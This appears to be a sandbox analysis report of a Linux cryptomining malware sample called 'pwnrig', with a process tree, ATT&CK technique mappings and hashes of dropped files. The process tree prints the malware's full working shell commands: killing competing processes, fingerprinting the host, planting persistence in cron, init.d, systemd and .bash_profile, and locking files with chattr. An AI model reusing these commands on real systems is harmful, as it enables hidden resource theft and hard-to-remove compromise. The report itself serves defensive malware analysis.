/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3025
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3026
-
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3027
-
-
/usr/bin/idid -u4⤵PID:3029
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3030
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3031
-
-
/usr/bin/grepgrep -v grep4⤵PID:3032
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:3034 -
/usr/bin/idid -u4⤵PID:3035
-
-
/usr/bin/psps aux4⤵
- Checks CPU configuration
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:3036
-
-
/usr/bin/grepgrep -v grep4⤵PID:3037
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3038
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3039
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3040
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:3042 -
/usr/bin/idid -u4⤵PID:3043
-
-
/usr/bin/psps aux4⤵
- Checks CPU configuration
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:3045
-
-
/usr/bin/grepgrep -v grep4⤵PID:3046
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:3047
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3048
-
-
/usr/bin/wcwc -l4⤵PID:3049
-
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/dpkg-deb-package.service2⤵PID:2862
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵PID:2863
-
-
/usr/bin/systemctlsystemctl enable dpkg-deb-package.service2⤵
- Changes its process name
- Reads runtime system information
PID:3057 -
/usr/bin/getoptgetopt -o r: --long root: -- enable dpkg-deb-package3⤵PID:3059
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d dpkg-deb-package defaults3⤵PID:3060
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3061
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3061
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3061
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3061
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d dpkg-deb-package enable3⤵PID:3185
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3186
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3186
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3186
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3186
-
-
-
-
/usr/bin/chattrchattr +ia /bin/dpkg-debian2⤵PID:3434
-
-
/usr/bin/crontabcrontab -r2⤵PID:3439
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3444
-
-
/usr/bin/bashbash -c "echo \"5 * * * * nohup /usr/local/share/.klibsystem5 >/dev/null 2>&1 &\" | crontab -"2⤵PID:3445
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:3447
-
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:3448
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:3449
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:3450
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:3451
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:3452
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:3453
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:3454
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:3455
-
-
/tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4/tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:3456 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:3457 -
/usr/bin/hostnamehostname -I4⤵
- Attempts to change immutable files
PID:3460
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3462
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:3464
-
-
/usr/bin/grepgrep "Port "4⤵PID:3465
-
-
/usr/bin/headhead -n 14⤵PID:3466
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:3467
-
-
/usr/bin/whoamiwhoami4⤵PID:3468
-
-
/usr/bin/hostnamehostname4⤵PID:3469
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3470
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3473
-
-
/usr/bin/cutcut -d: -f24⤵PID:3474
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3475
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3476
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3479
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3482
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3485
-
-
/usr/bin/awkawk "{print \$3}"4⤵PID:3488
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3496
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3502
-
-
/usr/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"4⤵PID:3505
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3508
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3509
-
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3510
-
-
/usr/bin/idid -u4⤵PID:3512
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3513
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3514
-
-
/usr/bin/grepgrep -v grep4⤵PID:3515
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Attempts to change immutable files
- Writes file to tmp directory
PID:3517 -
/usr/bin/idid -u4⤵PID:3518
-
-
/usr/bin/idid -u4⤵PID:3519
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3520
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:3521
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3522
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 /bin/bprofr4⤵
- Writes file to system bin folder
PID:3523
-
-
/usr/bin/idid -u4⤵PID:3524
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3525
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3526
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
- Attempts to change immutable files
PID:3527
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:3528
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 /bin/crondr4⤵
- Writes file to system bin folder
PID:3529
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3531
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
PID:3532
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:3533
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
PID:3534
-
-
/usr/bin/whichwhich chkconfig4⤵PID:3535
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:3536
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:3537
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵PID:3538
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3539
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3540
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3540
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3540
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3540
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:3672
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 /bin/initdr4⤵
- Writes file to system bin folder
PID:3673
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3675
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
PID:3676
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:3677
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3678
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3679
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3679
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3679
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3679
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3805
-
/usr/local/sbin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3806
-
-
/usr/local/bin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3806
-
-
/usr/sbin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3806
-
-
/usr/bin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3806
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3807
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3807
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3807
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3807
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:3933
-
-
/usr/bin/whichwhich systemctl4⤵PID:3934
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:3935
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:3936
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 /bin/sysdr4⤵
- Writes file to system bin folder
PID:3937
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:3939
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Attempts to change immutable files
PID:3940
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:3941
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3942
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:4068
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:4194
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:4320
-
-
-
-
/tmp/-python37-2bc57466-c60a-4a67-9ea4-14b24d7d0a0f/tmp/-python37-2bc57466-c60a-4a67-9ea4-14b24d7d0a0f2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:4391
-
-
/usr/bin/dpkg-deb-package./dpkg-deb-package1⤵PID:2860
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Discovery
Process Discovery
1Software Discovery
1Security Software Discovery
1System Information Discovery
3System Network Configuration Discovery
1Internet Connection Discovery
1System Network Connections Discovery
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD510493b1ab9b183e050fba5722ee49aec
SHA1f91a12e0d43e9e324bc48bae195fe01176ca8653
SHA25604130d68579248d6dd1b320947e1f0ebd41f5c04d8e251e4b50b05a79ac147b1
SHA51242155389c59fa5884d470a2888e6c3ba49d35a57141f8b003ed2e74677c0812529057d1911e25f54bcd315586dd19457bd8070fa2efacd9ba893f933a3c18496
-
Filesize
199B
MD5906980accf4b594d289d69ab3c2b212c
SHA107d5e5111fe11aa1aaa66c61dc4a3df74b3ec6dd
SHA2562e4d6729014e1722ea4839b574d63c0e17a72a99c7ff2fd73bbb981c3429d92c
SHA512467b5bffb60506600723b0b416393853d21bfeb19986537a492716a338de4deb2cfe414e62c047798d1ad3b945d1571f1286e6d9627f823f35e7704b0d095fb0
-
Filesize
196B
MD585af470e35a1ae54466bb6d33978ad92
SHA1d3a7f7639a62dd11db91fbcf55922e29b66f1935
SHA2560940db984b9b439904954693b7d2fd4dd9b295e1cb4c440b203b2e72a3aea0ba
SHA512a2702d6157fe0f475a04ff10d0860756e1aaa7c9ee0ff05ae51ef13c7d8cb358ddc85011557e37a142ec1803e5a8551dbfc873ffa85437e5e97bfdff89c18145
-
Filesize
366B
MD5906d7ce63c7466c6c65f509156bb1529
SHA11e3dcb514ce8007a594f6805c7bdde98fe2f7667
SHA256e3d6f2b6cc53564780785e6efb9e415b83e40342fe7afe210631fe84fd492476
SHA512f488084c847b471330dbef23bbb7e3c9def2b961a66406d8ae36de9fe168f9ae1c3db3b001f8e58bd2a0dbf91696a8512812a87bb805df71972a76b82e11cd4d
-
Filesize
381B
MD531fc62b7f5d35aac493ca5162b16f812
SHA123aae8aa6388120308c0bdacb66fee7ac8e8641b
SHA2560e36d48719109e697a24e8fe2f72239109f55071ae9c603f85301029fb09271d
SHA51269e99a9aaebd79746d04cb022107a4b813e4d9a806ba55e53d6493c9b3a893156a5518117dcf8e7d6cdae3e5598a56feff2b108e5707eea85cafcaddb6b7d776
-
Filesize
362B
MD5e09c35d4415da2a376db6c6c3ca6fcf1
SHA156f9c76d37312437f411726f4e0463e14acc67fd
SHA256d852c0b7fae9a031b60d4a2521d4d7824d83570bbb49082655b63b842befd69a
SHA5127f23bfe778b3e264841f623664a578e2db37b4cfb3d99960953f715a72f984a79d5095cb51f7b65fb671828df58440bd60de06d3354887ccbff3cffb5b792d30
-
Filesize
2.3MB
MD5b9f096559e923787ebb1288c93ce2902
SHA194851bcc8f9c651bcda0ff33d17356cb0b16cf12
SHA2561fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
SHA512ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
-
Filesize
184KB
MD563a86932a5bad5da32ebd1689aa814b3
SHA1472548a4b8295182f6ba8641d74725c2250b7243
SHA2560013b356966c3d693b253cdf00c7fdf698890c9b75605be07128cac446904ad9
SHA5124631e014f77c683819ae34278625b21525d9fa0697e5376ff2babfd77af3ca609fb4a82cde2374f2c96b00dc52cdc34d7efdc40a7ee2609566a6b6e9e630f332
-
Filesize
388B
MD534bba0e0c7ab1c364409fc350fa37868
SHA1a362f6eb47fa0ae5973d1d3b72a20e3c727cbd56
SHA2567d3126408366c9a8813fac8aa2e970e18e837542209c38b751bdee68c06304e1
SHA512249b8608d3a89f9e2a075a6b8164457686a256665729d7e441cafcba35567dd157eeb5123221c8ee4377993907e0100bcd55888fb94a36b557074c0df2850b26
-
Filesize
385B
MD59297e32544b3f6f52346919c3dcc4d78
SHA1a817c64117b4cba178242bf99b008c094f836c7c
SHA256fb6251a22cfb915b67202de5f89f331f18559e09438a89914271fe51018a4311
SHA5128472916e8ed3c8cc7c8db00c2dbe6c103d18406deb6f2d3b7cdba2573cc843adff36a7814997a25f134a53434b8d9c87705d0a184534dae617b2e9b385763662
-
Filesize
3.2MB
MD5396a812c15bd9809d0c8f438b8517827
SHA16a8eb0ee0a05cede17a50ec04b0a549d70325dcb
SHA256d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
SHA51283ba44b59c9aa517887d27de612b646a17e1b0e372e216e279f188a75e12759b27f181509287e08e79aa34872b59b711fc8efd014b463f58934f762a8d70e948
-
Filesize
239B
MD5cf8a91e56e441b06fd2dfce85cf75e9e
SHA19fb015b7f3969631515525ca394afb26405c85ef
SHA2560d246bb3d4b85a9f04217f0be70c9b9a9c3f95dfa593c497f02730fd6ec3ee2c
SHA5120b323f62652579be168a8be5c1006e397b98d8253a2fdf9e7287a53fc2fb0fdde44bb967d26c5fbb860d64b5076d686a92401db021340dc2416455d025910911